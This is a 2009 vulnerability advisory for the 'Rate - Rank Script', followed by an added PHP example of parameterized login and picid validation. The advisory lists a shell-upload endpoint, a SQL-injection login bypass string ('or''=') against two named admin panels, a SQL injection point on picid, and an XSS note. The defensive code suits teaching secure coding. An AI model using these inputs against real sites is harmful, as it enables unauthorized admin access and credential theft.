Rate - Rank Script ~ 5 Remote Vuln. | Cyber-Warrior Information Technology's World
Author : Bug Researchers/CWOmer
Date : 12.07.2009 21:23:43
Image Shell ;

< ------------------- header data start ------------------- >
#############################################################
# Application Name : Rate - Rank Script
# Vulnerable Type : Arbitrary File Upload Vulnerability
# Infection : The site can be hacked by uploading a shell
# Risk : High
# author : Bug Researchers | CWOmer
#############################################################
< ------------------- header data end of ------------------- >
< -- bug code start -- >
http://www.ezonescripts.com/productdemos/RateRank/Member_Admin/addSubImage.php?picid=269859
< -- bug code end of -- >

Login Bypass 1 ;

< ------------------- header data start ------------------- >
#############################################################
# Application Name : Rate - Rank Script
# Vulnerable Type : Login Bypass
# Infection : The login panel can be entered without a password
# Bug Fix Advice : The login panel must be filtered
# author : Bug Researchers | CWOmer
# Script Demo : http://www.ezonescripts.com/productdemos/RateRank/Site_Admin/index.php
#############################################################
< ------------------- header data end of ------------------- >
< -- bug code start -- >
username: 'or''='
password: 'or''='
< -- bug code end -- >

Login Bypass 2 ;

< ------------------- header data start ------------------- >
#############################################################
# Application Name : Rate - Rank Script
# Vulnerable Type : Login Bypass
# Infection : The login panel can be entered without a password
# Bug Fix Advice : The login panel must be filtered
# author : Bug Researchers | CWOmer
# Script Demo : http://www.ezonescripts.com/productdemos/RateRank/Member_Admin/index.php
#############################################################
< ------------------- header data end of ------------------- >
< -- bug code start -- >
username: 'or''='
password: 'or''='
< -- bug code end -- >

SQL Inj ;

< ------------------- header data start ------------------- >
#############################################################
# Application Name : Rate - Rank Script
# Vulnerable Type : SQL Injection
# Infection : Administrator usernames and passwords can be stolen
# Bug Fix Advice : The picid variable must be filtered
# author : Bug Researchers | CWOmer
#############################################################
< ------------------- header data end of ------------------- >
< -- bug code start -- >
RateRank/Site_Admin/member.php?picid=269859[SQL]
< -- bug code end of -- >

XSS ;

< ------------------- header data start ------------------- >
#############################################################
# Application Name : Rate - Rank Script
# Vulnerable Type : Cross Site Scripting
# Infection : Administrator and user cookies can be captured.
# Bug Fix Advice : Malicious characters must be filtered.
# author : Bug Researchers | CWOmer
#############################################################
< ------------------- header data end of ------------------- >
< -- bug code start -- >
An XSS command is to be entered into the inputs
< -- bug code end of -- >
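The two "Bug Fix Advice" items for the login panels and the picid variable, as an added PHP example that is not the Rate - Rank Script's own code. The table and column names, the in-memory SQLite database, the sample rows and the functions `login()` and `findPicture()` are assumptions made for illustration.

```php
<?php
// Added illustration; not code from the Rate - Rank Script.
// Schema, function names and sample rows are constructed for this example.
declare(strict_types=1);

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE admins (username TEXT PRIMARY KEY, pass_hash TEXT NOT NULL)');
$db->exec('CREATE TABLE pictures (picid INTEGER PRIMARY KEY, title TEXT NOT NULL)');
$db->prepare('INSERT INTO admins VALUES (?, ?)')
   ->execute(['admin', password_hash('constructed-sample-pw', PASSWORD_DEFAULT)]);
$db->exec("INSERT INTO pictures VALUES (269859, 'sample picture')");

// Login: the username is bound as data, never concatenated into the SQL text,
// and the password is checked against a stored hash instead of inside the query.
function login(PDO $db, string $user, string $pass): bool
{
    $stmt = $db->prepare('SELECT pass_hash FROM admins WHERE username = :u');
    $stmt->execute([':u' => $user]);
    $hash = $stmt->fetchColumn();
    return is_string($hash) && password_verify($pass, $hash);
}

// picid: accept only a positive integer, then still bind it as a parameter.
function findPicture(PDO $db, string $rawPicid): ?array
{
    $picid = filter_var($rawPicid, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($picid === false) {
        return null; // anything that is not a plain integer is rejected outright
    }
    $stmt = $db->prepare('SELECT picid, title FROM pictures WHERE picid = :id');
    $stmt->bindValue(':id', $picid, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

var_dump(login($db, "'or''='", "'or''='"));             // the advisory's login input
var_dump(login($db, 'admin', 'constructed-sample-pw')); // legitimate login
var_dump(findPicture($db, '269859'));                   // valid picid from the advisory URL
var_dump(findPicture($db, '269859[SQL]'));              // advisory's placeholder, non-integer
```

It runs under the PHP CLI with the pdo_sqlite extension enabled and needs no network or external database.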